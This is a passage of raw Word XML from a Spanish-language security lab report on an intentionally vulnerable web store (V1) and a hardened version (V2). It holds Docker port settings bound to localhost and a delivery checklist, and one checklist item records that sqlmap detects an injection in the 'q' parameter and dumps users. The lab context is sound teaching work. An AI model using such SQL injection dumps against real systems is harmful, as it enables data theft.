        </w:rPr>
        <w:t>backend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>resources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">. El </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> entregable se conserva también en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>/backup-v1.sql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53077235" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo B - Compatibilidad de puertos Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB54E58" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">En algunos equipos con Docker Desktop, una red marcada como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede impedir que los pu</w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">ertos aparezcan publicados. Si </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>compose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> muestra la columna PORTS vacía, crear </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>docker-compose.override.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la raíz con el siguiente contenido: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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="02E759E0" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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B5FCF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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>services:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>postgres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    ports:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      - "127.0.0.1:5432:5432"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  backend:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    ports:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      - "127.0.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.1:8080:8080"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  frontend:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    ports:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      - "127.0.0.1:3000:80"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>networks:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  laboratorio:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    internal: false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="006F9968" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="0809E6B2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C6CCD5"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="C6CCD5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CD2A5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Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>docker compose --profile full down</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose --profile full up -d --force-recreate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker compose ps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
                <w:color w:val="1B1F23"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:br/>
              <w:t>docker port tienda_v1_frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EE3EA77" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:after="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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="02FCD693" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9525" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="18" w:space="0" w:color="9E2A2B"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FCE8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A6D317" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="9E2A2B"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Seg</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:color w:val="9E2A2B"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">uridad: </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">La modificación conserva la publicación en 127.0.0.1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>reemplazar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dirección</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> por 0.0.0.0.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38C0883D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="10" w:space="1" w:color="20385F"/>
        </w:pBdr>
        <w:spacing w:before="180" w:after="80"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Anexo C - Lista de verificación para la entrega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3175"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="17F6F878" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr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D3766E6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color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Carátula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completa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc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173751F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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>docker</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>compose</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc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56111DC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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>V2 separada con HTTPS/TLS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="6696F5C5" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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8A6DB5F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color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Índice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actualizado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc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43ACC2A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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Pruebas A01 a A10 evidenciadas.</w:t>
            </w:r>
          </w:p>
        </w:tc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EB73C73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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">V2 bloquea </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>, RCE e IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="600B60F3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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85F7948" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Arquitectura</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>puertos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> documentados.</w:t>
            </w:r>
          </w:p>
        </w:tc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1BC9C85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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> detecta q y vuelca usuarios.</w:t>
            </w:r>
          </w:p>
        </w:tc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BCD5A3C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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Guías V1 y V2 incluidas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="6CD77068" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr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F932A1D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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>V1 ejecutada solo en localhost.</w:t>
            </w:r>
          </w:p>
        </w:tc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BC35A3A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color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Código y base de datos V1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>incluidos.</w:t>
            </w:r>
          </w:p>
        </w:tc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06925AE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:color w:val="20385F"/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Sin secretos reales ni datos personales.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20002AB6" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="00217A21">
      <w:pPr>
        <w:spacing w:before="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
